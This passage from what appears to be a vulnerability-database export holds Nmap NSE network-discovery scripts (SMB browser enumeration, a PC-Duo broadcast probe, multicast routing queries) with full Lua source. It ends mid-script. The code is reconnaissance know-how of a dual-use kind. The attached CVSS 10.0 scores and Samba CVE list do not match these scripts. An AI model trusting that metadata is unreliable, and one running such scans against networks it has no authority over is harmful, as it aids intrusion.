\"SRVSVC\" },\n SV_TYPE_SQLSERVER = { long = \"SQL Server\", short = \"MSSQL\" },\n SV_TYPE_DOMAIN_CTRL = { long = \"Domain Controller\", short = \"DC\" },\n SV_TYPE_DOMAIN_BAKCTRL = { long = \"Backup Domain Controller\", short = \"BDC\" },\n SV_TYPE_TIME_SOURCE = { long = \"Time Source\", short = \"TIME\" },\n SV_TYPE_AFP = { long = \"Apple File Protocol Server\", short = \"AFP\" },\n SV_TYPE_NOVELL = { long = \"Novell Server\", short = \"NOVELL\" },\n SV_TYPE_DOMAIN_MEMBER = { long = \"LAN Manager Domain Member\", short = \"MEMB\" },\n SV_TYPE_PRINTQ_SERVER = { long = \"Print server\", short = \"PRINT\" },\n SV_TYPE_DIALIN_SERVER = { long = \"Dial-in server\", short = \"DIALIN\" },\n SV_TYPE_SERVER_UNIX = { long = \"Unix server\", short = \"UNIX\" },\n SV_TYPE_NT = { long = \"Windows NT/2000/XP/2003 server\", short = \"NT\" },\n SV_TYPE_WFW = { long = \"Windows for workgroups\", short = \"WFW\" },\n SV_TYPE_SERVER_MFPN = { long = \"Microsoft File and Print for Netware\", short=\"MFPN\" },\n SV_TYPE_SERVER_NT = { long = \"Server\", short = \"SRV\" },\n SV_TYPE_POTENTIAL_BROWSER = { long = \"Potential Browser\", short = \"POTBRWS\" },\n SV_TYPE_BACKUP_BROWSER = { long = \"Backup Browser\", short = \"BCKBRWS\"},\n SV_TYPE_MASTER_BROWSER = { long = \"Master Browser\", short = \"MBRWS\"},\n SV_TYPE_DOMAIN_MASTER = { long = \"Domain Master Browser\", short = \"DOMBRWS\"},\n SV_TYPE_WINDOWS = { long = \"Windows 95/98/ME\", short=\"WIN95\"},\n SV_TYPE_DFS = { long = \"DFS Root\", short = \"DFS\"},\n SV_TYPE_TERMINALSERVER = { long = \"Terminal Server\", short = \"TS\" },\n}\n\nOutputFormat = {\n BY_TYPE_H = 1,\n BY_TYPE_V = 2,\n BY_TYPE_V_DETAILED = 3,\n}\n\n\naction = function(host, port)\n\n local status, smbstate = smb.start(host)\n local err, entries\n local path = (\"\\\\\\\\%s\\\\IPC$\"):format(host.ip)\n local detail_level = 1\n local format = stdnse.get_script_args(\"smb-mbenum.format\") or OutputFormat.BY_TYPE_V_DETAILED\n local filter = stdnse.get_script_args(\"smb-mbenum.filter\") or ServerTypes.SV_TYPE_ALL\n local domain = stdnse.get_script_args(\"smb-mbenum.domain\")\n\n filter = tonumber(filter) or ServerTypes[filter]\n format = tonumber(format)\n\n if ( not(filter) ) then\n return \"\\n The argument smb-mbenum.filter contained an invalid value.\"\n end\n\n if ( not(format) ) then\n return \"\\n The argument smb-mbenum.format contained an invalid value.\"\n end\n\n local errstr = nil\n status, err = smb.negotiate_protocol(smbstate, {})\n if ( not(status) ) then\n log(\"ERROR: smb.negotiate_protocol failed\")\n errstr = \"\\n ERROR: Failed to connect to browser service: \" .. err\n else\n\n status, err = smb.start_session(smbstate, {})\n if ( not(status) ) then\n log(\"ERROR: smb.start_session failed\")\n errstr = \"\\n ERROR: Failed to connect to browser service: \" .. err\n else\n\n status, err = smb.tree_connect(smbstate, path, {})\n if ( not(status) ) then\n log(\"ERROR: smb.tree_connect failed\")\n errstr = \"\\n ERROR: Failed to connect to browser service: \" .. err\n else\n\n status, entries = msrpc.rap_netserverenum2(smbstate, domain, filter, detail_level)\n if ( not(status) ) then\n log(\"ERROR: msrpc.rap_netserverenum2 failed\")\n -- 71 == 0x00000047, ERROR_REQ_NOT_ACCEP\n -- http://msdn.microsoft.com/en-us/library/cc224501.aspx\n if entries:match(\"= 71$\") then\n errstr = \"Not a master or backup browser\"\n else\n errstr = \"\\n ERROR: \" .. entries\n end\n end\n end\n\n status, err = smb.tree_disconnect(smbstate)\n if ( not(status) ) then log(\"ERROR: smb.tree_disconnect failed\") end\n end\n\n status, err = smb.logoff(smbstate)\n if ( not(status) ) then log(\"ERROR: smb.logoff failed\") end\n end\n\n status, err = smb.stop(smbstate)\n if ( not(status) ) then log(\"ERROR: smb.stop failed\") end\n\n if errstr then\n return errstr\n end\n\n local results, output = {}, {}\n for k, _ in pairs(ServerTypes) do\n for _, server in ipairs(entries) do\n if ( TypeNames[k] and (server.type & ServerTypes[k]) == ServerTypes[k] ) then\n results[TypeNames[k].long] = results[TypeNames[k].long] or {}\n if ( format == OutputFormat.BY_TYPE_V_DETAILED ) then\n table.insert(results[TypeNames[k].long], server)\n else\n table.insert(results[TypeNames[k].long], server.name)\n end\n end\n end\n end\n\n if ( format == OutputFormat.BY_TYPE_H ) then\n for k, v in pairs(results) do\n local row = (\"%s: %s\"):format( k, table.concat(v, \",\") )\n table.insert(output, row)\n end\n table.sort(output)\n elseif( format == OutputFormat.BY_TYPE_V ) then\n for k, v in pairs(results) do\n v.name = k\n table.insert(output, v)\n end\n table.sort(output, function(a,b) return a.name < b.name end)\n elseif( format == OutputFormat.BY_TYPE_V_DETAILED ) then\n for k, v in pairs(results) do\n local cat_tab = tab.new(3)\n table.sort(v, function(a,b) return a.name < b.name end )\n for _, server in pairs(v) do\n tab.addrow(\n cat_tab,\n server.name,\n (\"%d.%d\"):format(server.version.major,server.version.minor),\n server.comment\n )\n end\n table.insert(output, { name = k, tab.dump(cat_tab) } )\n end\n table.sort(output, function(a,b) return a.name < b.name end)\n end\n\n return stdnse.format_output(true, output)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:56", "description": "Discovers PC-DUO remote control hosts and gateways running on a LAN by sending a special broadcast UDP probe.\n\n## Script Arguments \n\n#### broadcast-pc-duo.timeout \n\nspecifies the amount of seconds to sniff the network interface. (default varies according to timing. -T3 = 5s)\n\n## Example Usage \n \n \n nmap --script broadcast-pc-duo\n \n\n## Script Output \n \n \n Pre-scan script results:\n | broadcast-pc-duo:\n | PC-Duo Gateway Server\n | 10.0.200.113 - WIN2K3SRV-1\n | PC-Duo Hosts\n |_ 10.0.200.113 - WIN2K3SRV-1\n \n\n## Requires \n\n * [coroutine](<>)\n * [nmap](<../lib/nmap.html>)\n * [os](<>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-12-18T09:33:38", "type": "nmap", "title": "broadcast-pc-duo NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2017-03-25T13:39:44", "id": "NMAP:BROADCAST-PC-DUO.NSE", "href": "https://nmap.org/nsedoc/scripts/broadcast-pc-duo.html", "sourceData": "local coroutine = require \"coroutine\"\nlocal nmap = require \"nmap\"\nlocal os = require \"os\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\n\ndescription = [[\nDiscovers PC-DUO remote control hosts and gateways running on a LAN by sending a special broadcast UDP probe.\n]]\n\n---\n-- @usage\n-- nmap --script broadcast-pc-duo\n--\n-- @output\n-- Pre-scan script results:\n-- | broadcast-pc-duo:\n-- | PC-Duo Gateway Server\n-- | 10.0.200.113 - WIN2K3SRV-1\n-- | PC-Duo Hosts\n-- |_ 10.0.200.113 - WIN2K3SRV-1\n--\n-- @args broadcast-pc-duo.timeout specifies the amount of seconds to sniff\n-- the network interface. (default varies according to timing. -T3 = 5s)\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = { \"broadcast\", \"safe\" }\n\nlocal TIMEOUT = stdnse.parse_timespec(stdnse.get_script_args(\"broadcast-pc-duo.timeout\"))\n\nprerule = function() return ( nmap.address_family() == \"inet\") end\n\n-- Sends a UDP probe to the server and processes the response\n-- @param probe table containing a pc-duo probe\n-- @param responses table containing the responses\nlocal function udpProbe(probe, responses)\n\n local condvar = nmap.condvar(responses)\n local socket = nmap.new_socket(\"udp\")\n socket:set_timeout(500)\n\n for i=1,2 do\n local status = socket:sendto(probe.host, probe.port, probe.data)\n if ( not(status) ) then\n return stdnse.format_output(false, \"Failed to send broadcast request\")\n end\n end\n\n local timeout = TIMEOUT or ( 20 / ( nmap.timing_level() + 1 ) )\n local stime = os.time()\n local hosts = {}\n\n repeat\n local status, data = socket:receive()\n if ( status ) then\n local srvname = data:match(probe.match)\n if ( srvname ) then\n local status, _, _, rhost, _ = socket:get_info()\n if ( not(status) ) then\n socket:close()\n return false, \"Failed to get socket information\"\n end\n -- avoid duplicates\n hosts[rhost] = srvname\n end\n end\n until( os.time() - stime > timeout )\n socket:close()\n\n local result = {}\n for ip, name in pairs(hosts) do\n table.insert(result, (\"%s - %s\"):format(ip,name))\n end\n\n if ( #result > 0 ) then\n result.name = probe.topic\n table.insert(responses, result)\n end\n\n condvar \"signal\"\nend\n\naction = function()\n\n -- PC-Duo UDP probes\n local probes = {\n -- PC-Duo Host probe\n {\n host = { ip = \"255.255.255.255\" },\n port = { number = 1505, protocol = \"udp\" },\n data = stdnse.fromhex(\"00808008ff00\"),\n match= \"^.........(%w*)\\0\",\n topic= \"PC-Duo Hosts\"\n },\n -- PC-Duo Gateway Server probe\n {\n host = { ip = \"255.255.255.255\" },\n port = { number = 2303, protocol = \"udp\" },\n data = stdnse.fromhex(\"20908008ff00\"),\n match= \"^.........(%w*)\\0\",\n topic= \"PC-Duo Gateway Server\"\n },\n }\n\n local threads, responses = {}, {}\n local condvar = nmap.condvar(responses)\n\n -- start a thread for each probe\n for _, p in ipairs(probes) do\n local th = stdnse.new_thread( udpProbe, p, responses )\n threads[th] = true\n end\n\n -- wait until the probes are all done\n repeat\n for thread in pairs(threads) do\n if coroutine.status(thread) == \"dead\" then\n threads[thread] = nil\n end\n end\n if ( next(threads) ) then\n condvar \"wait\"\n end\n until next(threads) == nil\n\n table.sort(responses, function(a,b) return a.name < b.name end)\n -- did we get any responses\n if ( #responses > 0 ) then\n return stdnse.format_output(true, responses)\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:40:42", "description": "Queries targets for multicast routing information. \n\nThis works by sending a DVMRP Ask Neighbors 2 request to the target and listening for DVMRP Neighbors 2 responses that are sent back and which contain local addresses and the multicast neighbors on each interface of the target. If no specific target is specified, the request will be sent to the 224.0.0.1 All Hosts multicast address. \n\nThis script is similar somehow to the mrinfo utility included with Windows and Cisco IOS.\n\n## Script Arguments \n\n#### mrinfo.target \n\nHost to which the request is sent. If not set, the request will be sent to `224.0.0.1`.\n\n#### mrinfo.timeout \n\nTime to wait for responses. Defaults to `5s`.\n\n#### max-newtargets, newtargets \n\nSee the documentation for the [target](<../lib/target.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script mrinfo\n nmap --script mrinfo -e eth1\n nmap --script mrinfo --script-args 'mrinfo.target=172.16.0.4'\n \n\n## Script Output \n \n \n Pre-scan script results:\n | mrinfo:\n | Source: 224.0.0.1\n | Version 12.4\n | Local address: 172.16.0.2\n | Neighbor: 172.16.0.4\n | Neighbor: 172.16.0.3\n | Local address: 172.17.0.1\n | Neighbor: 172.17.0.2\n | Local address: 172.18.0.1\n | Neighbor: 172.18.0.2\n | Source: 224.0.0.1\n | Version 12.4\n | Local address: 172.16.0.4\n | Neighbor: 172.16.0.3\n | Neighbor: 172.16.0.2\n | Local address: 172.17.0.2\n | Neighbor: 172.17.0.1\n | Source: 224.0.0.1\n | Version 12.4\n | Local address: 172.16.0.3\n | Neighbor: 172.16.0.4\n | Neighbor: 172.16.0.2\n | Local address: 172.18.0.2\n | Neighbor: 172.18.0.1\n |_ Use the newtargets script-arg to add the responses as targets\n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [packet](<../lib/packet.html>)\n * [ipOps](<../lib/ipOps.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [target](<../lib/target.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-08-03T22:58:29", "type": "nmap", "title": "mrinfo NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-09-08T17:07:01", "id": "NMAP:MRINFO.NSE", "href": "https://nmap.org/nsedoc/scripts/mrinfo.html", "sourceData": "local nmap = require \"nmap\"\nlocal packet = require \"packet\"\nlocal ipOps = require \"ipOps\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal target = require \"target\"\nlocal table = require \"table\"\n\n\ndescription = [[\nQueries targets for multicast routing information.\n\nThis works by sending a DVMRP Ask Neighbors 2 request to the target and\nlistening for DVMRP Neighbors 2 responses that are sent back and which contain\nlocal addresses and the multicast neighbors on each interface of the target. If\nno specific target is specified, the request will be sent to the 224.0.0.1 All\nHosts multicast address.\n\nThis script is similar somehow to the mrinfo utility included with Windows and\nCisco IOS.\n]]\n\n---\n-- @args mrinfo.target Host to which the request is sent. If not set, the\n-- request will be sent to <code>224.0.0.1</code>.\n--\n-- @args mrinfo.timeout Time to wait for responses.\n-- Defaults to <code>5s</code>.\n--\n--@usage\n-- nmap --script mrinfo\n-- nmap --script mrinfo -e eth1\n-- nmap --script mrinfo --script-args 'mrinfo.target=172.16.0.4'\n--\n--@output\n-- Pre-scan script results:\n-- | mrinfo:\n-- | Source: 224.0.0.1\n-- | Version 12.4\n-- | Local address: 172.16.0.2\n-- | Neighbor: 172.16.0.4\n-- | Neighbor: 172.16.0.3\n-- | Local address: 172.17.0.1\n-- | Neighbor: 172.17.0.2\n-- | Local address: 172.18.0.1\n-- | Neighbor: 172.18.0.2\n-- | Source: 224.0.0.1\n-- | Version 12.4\n-- | Local address: 172.16.0.4\n-- | Neighbor: 172.16.0.3\n-- | Neighbor: 172.16.0.2\n-- | Local address: 172.17.0.2\n-- | Neighbor: 172.17.0.1\n-- | Source: 224.0.0.1\n-- | Version 12.4\n-- | Local address: 172.16.0.3\n-- | Neighbor: 172.16.0.4\n-- | Neighbor: 172.16.0.2\n-- | Local address: 172.18.0.2\n-- | Neighbor: 172.18.0.1\n-- |_ Use the newtargets script-arg to add the responses as targets\n--\n\n\nauthor = \"Hani Benhabiles\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"discovery\", \"safe\", \"broadcast\"}\n\n\nprerule = function()\n if nmap.address_family() ~= 'inet' then\n stdnse.verbose1(\"is IPv4 only.\")\n return false\n end\n if not nmap.is_privileged() then\n stdnse.verbose1(\"not running for lack of privileges.\")\n return false\n end\n return true\nend\n\n-- Parses a DVMRP Ask Neighbor 2 raw data and returns\n-- a structured response.\n-- @param data raw data.\nlocal mrinfoParse = function(data)\n local index, address, neighbor\n local response = {}\n\n -- first byte should be IGMP type == 0x13 (DVMRP)\n if data:byte(1) ~= 0x13 then return end\n\n -- DVMRP Code\n response.code,\n -- Checksum\n response.checksum,\n -- Capabilities (Skip one reserved byte)\n response.capabilities,\n -- Major and minor version\n response.minver,\n response.majver, index = string.unpack(\">B I2 x B B B\", data, 2)\n resp